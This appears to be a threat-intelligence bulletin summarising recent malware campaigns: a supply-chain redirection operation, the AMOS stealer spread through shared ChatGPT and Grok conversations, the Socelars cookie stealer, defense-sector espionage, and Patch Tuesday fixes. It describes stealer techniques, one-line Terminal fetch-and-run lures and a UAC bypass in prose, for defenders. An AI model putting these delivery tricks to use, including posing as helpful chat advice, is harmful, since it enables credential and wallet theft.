Update: Cross-Platform Supply Chain Attack via Trusted Download Channels
A newly uncovered campaign tracked as RU-APT-ChainReaver-L is exploiting trusted download pathways to push malware at scale across Windows, macOS, and iOS. The actors are tampering with popular mirror and file-distribution portals, altering site code so people looking for legitimate files are quietly routed through attacker-managed redirection chains. Victims see familiar download pages, but prominent “sponsored” or oversized download buttons redirect them to malicious infrastructure rather than the intended destination. From there, the attack adapts to the visitor’s operating system, allowing the campaign to maintain a consistent front-end experience while delivering different payloads behind the scenes. On Windows, the chain commonly ends in archived bundles hosted on mainstream cloud storage services, packaged to appear as installers or common software downloads. Investigators characterize the operation as unusually large and complex, with a broad reach into both individual users and corporate environments. The campaign also leverages compromised long-standing GitHub accounts to host malware through repositories presented as “cracks” and activation toolkits, complete with polished documentation and misleading “clean” claims to build confidence. Those repos often push victims onward to attacker-controlled pages hosted on trusted web platforms before final delivery, making the traffic appear routine to many defenses. Windows payloads focus on stealing sensitive data, including browser logins, messaging content, crypto wallets, and local files, and then sending it to attacker servers. macOS victims are steered into social-engineering pages that instruct them to run a one-line Terminal command, enabling staged delivery that runs largely in memory and aims to steal high-value information, including cloud credentials and wallet access. iOS users are redirected to a VPN app listing linked to a suspicious publisher, then receive phishing prompts and malicious pop-ups after installation. Recommended actions include blocking and closely monitoring downloads initiated from mirror portals, tightening controls around GitHub-sourced tools, treating verification prompts and one-line Terminal commands as high risk, enforcing application allow-listing for employee endpoints, increasing visibility into outbound data movement, and refreshing user training to discourage downloads of pirated or unverified software.
Update: Google Ads and Shared AI Chats Used to Deliver AMOS Stealer on macOS
Threat actors are pushing malicious “how-to” guidance through publicly shared ChatGPT and Grok conversations, then amplifying those pages through Google Search ads to reach macOS users. The trap often starts with an everyday search, where sponsored results lead to a convincing AI chat page that reads like real troubleshooting help. The instructions walk the user through copying a Terminal command that triggers the Atomic macOS Stealer (AMOS) infection, shifting the attack away from obvious fake downloads and toward “trusted” looking advice. Reports describe the command flow as pulling down and running a script in one step, sometimes using encoding to hide what it is doing. This approach blends legitimate platforms, advertising visibility, and user action into a delivery path that can bypass the caution people normally apply to unknown installers. At the same time, macOS infostealers are maturing into an organized marketplace focused on browser data, Keychain secrets, and especially cryptocurrency access. Researchers also highlight a broader trend: stealer operators are targeting a large number of Chrome crypto extensions and pairing theft with wallet-themed phishing aimed at major wallet brands. Underground forums are promoting partner-based distribution models in which affiliates share profits, helping these campaigns spread faster and evolve. Separate reports show related macOS malware arriving as signed, notarized applications that can appear legitimate to built-in macOS checks, increasing the odds a user will proceed without hesitation. Practical warning signs include anyone copying “fix” commands into Terminal that immediately fetch and execute code, and apps requesting sensitive access that do not match the task the user is trying to complete. Another useful signal is unexpected outbound connections from non-financial apps to blockchain-related infrastructure, which may indicate credential or wallet theft. Recommended actions include restricting or reviewing the use of paid search results for support guidance, blocking risky command patterns on managed Macs, reinforcing helpdesk guidance to never run one-line Terminal fixes from the web, and increasing monitoring for unusual data access and outbound traffic that indicates information-stealing behavior.
Socelars Stealer Targets Windows Sessions and Ad Accounts
Security teams are tracking Socelars, a Windows information-stealing trojan built to quietly capture access rather than disrupt systems. Its main value to attackers is stealing browser session data so they can reuse a victim’s already authenticated access to online services without needing the password. Public reporting links this activity to Facebook Ads Manager abuse, where stolen sessions can be used to execute ad account takeovers and cause immediate financial loss. Researchers also observed it targeting session cookies tied to major platforms, including Facebook and Amazon, which can be enough to hijack accounts, change settings, or run transactions. Earlier waves spread through a fake PDF reader installer that looked legitimate in a workplace context, then operated in the background with minimal user-visible impact. Once run, the installer has been reported to create a local folder associated with the lure and proceed with data theft, with few obvious signs. On the technical side, Socelars has been observed pulling cookie data from common browsers by reading local cookie storage, then using that access to query advertising-related pages and extract identifiers and tokens that support continued access. Sandbox findings describe an initial phase of system checks and reconnaissance, followed by an attempt to elevate privileges using a User Account Control (UAC) bypass tied to Windows auto-elevation behavior. In the same activity, analysts saw it create a mutex named “patatoes” and contact the iplogger[.]org service, then terminate itself in a way that appears to be a normal crash, reducing the chance that a user investigates. The business risk is straightforward: stolen ad access can be used to launch fraudulent campaigns, drain budgets, and resell compromised accounts, and the risk can expand further if billing details and payment information are also captured. Reports indicate the data of interest can include ad account identifiers, access tokens, session cookies, page details, spending limits, and payment-linked information that is easy to monetize quickly. Organizations can reduce exposure by blocking untrusted PDF tool downloads, tightening endpoint controls to detect unusual access to browser cookie storage, enforcing strong sign-in protections for advertising accounts, and monitoring for unexpected ad activity and billing changes.
Defense Under Pressure: Espionage, Personnel Targeting, and Supply Chain Risk Converge
Google Threat Intelligence Group (GTIG) assessment highlights a multi-front risk where state-backed groups and criminals target the defense industrial base through battlefield-adjacent systems, personnel devices, and global manufacturing networks that supply modern militaries. Attackers increasingly bypass enterprise monitoring by targeting individual soldiers and contractors, abusing device-linking features in encrypted messaging apps, and using highly tailored lures tied to drones and battlefield workflows. The activity spans multiple actor sets, with Russia-aligned groups targeting organizations connected to the Russia-Ukraine war, North Korean operations attempting to infiltrate firms through hiring pipelines, Iranian clusters running job-themed phishing at scale, and China-nexus actors driving high-volume espionage with a heavy focus on perimeter and edge devices. Supply chain exposure is expanding the blast radius, as extortion and hack-and-leak activity against manufacturers can disrupt production and spill over into defense programs, even when prime contractors are not the direct targets. The overall message is that compromise can happen well before systems reach the field, affecting design, procurement, and operations through people, vendors, and infrastructure that are not always treated as core security priorities. Recent campaign observations reinforce this direction by showing how a mature espionage ecosystem targeting Indian government and defense entities continues to evolve across both Windows and Linux. Researchers report active phishing operations delivering Windows payloads through shortcut and script-based attachments that trigger stealthy execution paths and establish resilient persistence for long-term access. On Linux, a separate track used a downloader to deploy a Python-based remote access tool that profiles hosts, enumerates files, and exfiltrates data while persisting through system services to survive reboots. They also observed a newer tool delivered through a malicious PowerPoint add-in that emphasizes detailed host monitoring and continuous command-and-control, signaling experimentation with new delivery routes that blend into normal workflows. Together, these findings align with GTIG’s view that the greatest danger lies in sustained access and intelligence collection, not in fast, noisy disruption. Organizations can reduce risk by hardening edge and perimeter systems, tightening hiring and vendor onboarding controls, and expanding monitoring to cover personal and contractor devices used for mission work. They should also operationalize threat intelligence into proactive hunting and incident response, reinforce training that targets job-themed lures and “productivity” add-ins, and validate supply chain security requirements down to smaller manufacturers and service providers.
Patch Tuesday Update
Microsoft has released the February 10th, patch Tuesday, which includes its latest updates addressing critical security vulnerabilities across Windows and Microsoft Office. These updates include fixes for five critical flaws that could enable remote code execution, elevation of privilege, or information disclosure if left unpatched. This Patch Tuesday also resolves six zero-day vulnerabilities that Microsoft reports were exploited in the wild, with three of them publicly disclosed before a fix was available, which increases the urgency to prioritize deployment.
